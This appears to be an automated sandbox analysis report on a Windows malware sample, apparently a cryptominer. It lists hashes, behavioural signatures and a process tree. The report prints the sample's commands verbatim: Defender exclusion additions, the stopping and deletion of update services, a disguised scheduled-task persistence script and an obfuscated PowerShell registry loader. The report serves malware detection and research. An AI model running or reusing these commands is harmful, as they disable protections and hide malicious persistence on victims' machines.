Analysis
-
max time kernel
1787s -
max time network
1788s -
platform
windows7_x64 -
resource
win7-20230621-es -
resource tags
arch:x64arch:x86image:win7-20230621-eslocale:es-esos:windows7-x64systemwindows -
submitted
29-06-2023 21:17
Static task
static1
Behavioral task
behavioral1
Sample
dmi1dfg7n.exe
Resource
win7-20230621-es
Behavioral task
behavioral2
Sample
dmi1dfg7n.exe
Resource
win10v2004-20230621-es
General
-
Target
dmi1dfg7n.exe
-
Size
2.8MB
-
MD5
9253ed091d81e076a3037e12af3dc871
-
SHA1
ec02829a25b3bf57ad061bbe54180d0c99c76981
-
SHA256
78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
-
SHA512
29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
SSDEEP
49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 908 created 504 908 powershell.EXE winlogon.exe PID 940 created 504 940 powershell.EXE winlogon.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
services.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Program Files\\Google\\Libs\\WR64.sys" services.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 2044 updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 1532 taskeng.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
dmi1dfg7n.exepowershell.EXEpowershell.EXEupdater.exedescription pid process target process PID 2008 set thread context of 1940 2008 dmi1dfg7n.exe dialer.exe PID 908 set thread context of 924 908 powershell.EXE dllhost.exe PID 940 set thread context of 1476 940 powershell.EXE dllhost.exe PID 2044 set thread context of 284 2044 updater.exe dialer.exe PID 2044 set thread context of 1016 2044 updater.exe dialer.exe -
Drops file in Program Files directory 4 IoCs
Processes:
updater.execmd.execmd.exedmi1dfg7n.exedescription ioc process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe dmi1dfg7n.exe -
Drops file in Windows directory 5 IoCs
Processes:
dialer.exedescription ioc process File created C:\Windows\Tasks\dialersvc64.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc64.job dialer.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform\Cache\cache.dat File created C:\Windows\Tasks\dialersvc32.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc32.job dialer.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 880 sc.exe 1888 sc.exe 2016 sc.exe 1452 sc.exe 1428 sc.exe 1584 sc.exe 1556 sc.exe 1424 sc.exe 1760 sc.exe 1336 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.EXEWMIC.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0cf1623cfaad901 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepowershell.EXEpowershell.exepowershell.exedllhost.exedialer.exepid process 912 powershell.exe 536 powershell.exe 824 powershell.exe 908 powershell.EXE 908 powershell.EXE 924 dllhost.exe 924 dllhost.exe 924 dllhost.exe 924 dllhost.exe 940 powershell.EXE 940 powershell.EXE 1812 powershell.exe 1936 powershell.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1476 dllhost.exe 1016 dialer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
services.exepid process 424 services.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowershell.exepowershell.EXEdllhost.exepowershell.EXEpowershell.exepowercfg.exepowershell.exepowercfg.exeupdater.exepowercfg.exepowercfg.exedialer.exeWMIC.exedllhost.exeservices.exedescription pid process Token: SeDebugPrivilege 912 powershell.exe Token: SeShutdownPrivilege 1424 powercfg.exe Token: SeShutdownPrivilege 1468 powercfg.exe Token: SeShutdownPrivilege 924 powercfg.exe Token: SeDebugPrivilege 536 powershell.exe Token: SeShutdownPrivilege 1752 powercfg.exe Token: SeDebugPrivilege 824 powershell.exe Token: SeDebugPrivilege 908 powershell.EXE Token: SeDebugPrivilege 908 powershell.EXE Token: SeDebugPrivilege 924 dllhost.exe Token: SeDebugPrivilege 940 powershell.EXE Token: SeDebugPrivilege 940 powershell.EXE Token: SeDebugPrivilege 1812 powershell.exe Token: SeShutdownPrivilege 1616 powercfg.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeShutdownPrivilege 1956 powercfg.exe Token: SeDebugPrivilege 2044 updater.exe Token: SeShutdownPrivilege 1468 powercfg.exe Token: SeShutdownPrivilege 820 powercfg.exe Token: SeLockMemoryPrivilege 1016 dialer.exe Token: SeAssignPrimaryTokenPrivilege 1508 WMIC.exe Token: SeIncreaseQuotaPrivilege 1508 WMIC.exe Token: SeSecurityPrivilege 1508 WMIC.exe Token: SeTakeOwnershipPrivilege 1508 WMIC.exe Token: SeLoadDriverPrivilege 1508 WMIC.exe Token: SeSystemtimePrivilege 1508 WMIC.exe Token: SeBackupPrivilege 1508 WMIC.exe Token: SeRestorePrivilege 1508 WMIC.exe Token: SeShutdownPrivilege 1508 WMIC.exe Token: SeSystemEnvironmentPrivilege 1508 WMIC.exe Token: SeUndockPrivilege 1508 WMIC.exe Token: SeManageVolumePrivilege 1508 WMIC.exe Token: SeDebugPrivilege 1476 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 1508 WMIC.exe Token: SeIncreaseQuotaPrivilege 1508 WMIC.exe Token: SeSecurityPrivilege 1508 WMIC.exe Token: SeTakeOwnershipPrivilege 1508 WMIC.exe Token: SeLoadDriverPrivilege 1508 WMIC.exe Token: SeSystemtimePrivilege 1508 WMIC.exe Token: SeBackupPrivilege 1508 WMIC.exe Token: SeRestorePrivilege 1508 WMIC.exe Token: SeShutdownPrivilege 1508 WMIC.exe Token: SeSystemEnvironmentPrivilege 1508 WMIC.exe Token: SeUndockPrivilege 1508 WMIC.exe Token: SeManageVolumePrivilege 1508 WMIC.exe Token: SeLoadDriverPrivilege 424 services.exe Token: SeBackupPrivilege 424 services.exe Token: SeRestorePrivilege 424 services.exe Token: SeSecurityPrivilege 424 services.exe Token: SeTakeOwnershipPrivilege 424 services.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
dmi1dfg7n.execmd.execmd.exepowershell.exedescription pid process target process PID 2008 wrote to memory of 912 2008 dmi1dfg7n.exe powershell.exe PID 2008 wrote to memory of 912 2008 dmi1dfg7n.exe powershell.exe PID 2008 wrote to memory of 912 2008 dmi1dfg7n.exe powershell.exe PID 2008 wrote to memory of 1684 2008 dmi1dfg7n.exe cmd.exe PID 2008 wrote to memory of 1684 2008 dmi1dfg7n.exe cmd.exe PID 2008 wrote to memory of 1684 2008 dmi1dfg7n.exe cmd.exe PID 2008 wrote to memory of 1044 2008 dmi1dfg7n.exe cmd.exe PID 2008 wrote to memory of 1044 2008 dmi1dfg7n.exe cmd.exe PID 2008 wrote to memory of 1044 2008 dmi1dfg7n.exe cmd.exe PID 2008 wrote to memory of 536 2008 dmi1dfg7n.exe powershell.exe PID 2008 wrote to memory of 536 2008 dmi1dfg7n.exe powershell.exe PID 2008 wrote to memory of 536 2008 dmi1dfg7n.exe powershell.exe PID 1684 wrote to memory of 1584 1684 cmd.exe sc.exe PID 1684 wrote to memory of 1584 1684 cmd.exe sc.exe PID 1684 wrote to memory of 1584 1684 cmd.exe sc.exe PID 1044 wrote to memory of 1424 1044 cmd.exe powercfg.exe PID 1044 wrote to memory of 1424 1044 cmd.exe powercfg.exe PID 1044 wrote to memory of 1424 1044 cmd.exe powercfg.exe PID 1684 wrote to memory of 880 1684 cmd.exe sc.exe PID 1684 wrote to memory of 880 1684 cmd.exe sc.exe PID 1684 wrote to memory of 880 1684 cmd.exe sc.exe PID 1684 wrote to memory of 1336 1684 cmd.exe sc.exe PID 1684 wrote to memory of 1336 1684 cmd.exe sc.exe PID 1684 wrote to memory of 1336 1684 cmd.exe sc.exe PID 1684 wrote to memory of 1556 1684 cmd.exe sc.exe PID 1684 wrote to memory of 1556 1684 cmd.exe sc.exe PID 1684 wrote to memory of 1556 1684 cmd.exe sc.exe PID 1044 wrote to memory of 1468 1044 cmd.exe powercfg.exe PID 1044 wrote to memory of 1468 1044 cmd.exe powercfg.exe PID 1044 wrote to memory of 1468 1044 cmd.exe powercfg.exe PID 1684 wrote to memory of 1888 1684 cmd.exe sc.exe PID 1684 wrote to memory of 1888 1684 cmd.exe sc.exe PID 1684 wrote to memory of 1888 1684 cmd.exe sc.exe PID 1044 wrote to memory of 924 1044 cmd.exe powercfg.exe PID 1044 wrote to memory of 924 1044 cmd.exe powercfg.exe PID 1044 wrote to memory of 924 1044 cmd.exe powercfg.exe PID 1684 wrote to memory of 820 1684 cmd.exe reg.exe PID 1684 wrote to memory of 820 1684 cmd.exe reg.exe PID 1684 wrote to memory of 820 1684 cmd.exe reg.exe PID 1044 wrote to memory of 1752 1044 cmd.exe powercfg.exe PID 1044 wrote to memory of 1752 1044 cmd.exe powercfg.exe PID 1044 wrote to memory of 1752 1044 cmd.exe powercfg.exe PID 1684 wrote to memory of 604 1684 cmd.exe reg.exe PID 1684 wrote to memory of 604 1684 cmd.exe reg.exe PID 1684 wrote to memory of 604 1684 cmd.exe reg.exe PID 1684 wrote to memory of 744 1684 cmd.exe reg.exe PID 1684 wrote to memory of 744 1684 cmd.exe reg.exe PID 1684 wrote to memory of 744 1684 cmd.exe reg.exe PID 1684 wrote to memory of 1452 1684 cmd.exe reg.exe PID 1684 wrote to memory of 1452 1684 cmd.exe reg.exe PID 1684 wrote to memory of 1452 1684 cmd.exe reg.exe PID 1684 wrote to memory of 856 1684 cmd.exe reg.exe PID 1684 wrote to memory of 856 1684 cmd.exe reg.exe PID 1684 wrote to memory of 856 1684 cmd.exe reg.exe PID 536 wrote to memory of 1516 536 powershell.exe schtasks.exe PID 536 wrote to memory of 1516 536 powershell.exe schtasks.exe PID 536 wrote to memory of 1516 536 powershell.exe schtasks.exe PID 2008 wrote to memory of 1940 2008 dmi1dfg7n.exe dialer.exe PID 2008 wrote to memory of 1940 2008 dmi1dfg7n.exe dialer.exe PID 2008 wrote to memory of 1940 2008 dmi1dfg7n.exe dialer.exe PID 2008 wrote to memory of 1940 2008 dmi1dfg7n.exe dialer.exe PID 2008 wrote to memory of 824 2008 dmi1dfg7n.exe powershell.exe PID 2008 wrote to memory of 824 2008 dmi1dfg7n.exe powershell.exe PID 2008 wrote to memory of 824 2008 dmi1dfg7n.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b173516c-4f6e-4d66-b3cb-64869b2535e3}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{409e5b0d-45fe-4fcc-a60e-48112ef823af}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"1⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {E5159952-F0BC-497F-B2D7-50E4168E673E} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe xtrjicqmdliu3⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"1⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor2⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\verclsid.exe"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x4011⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
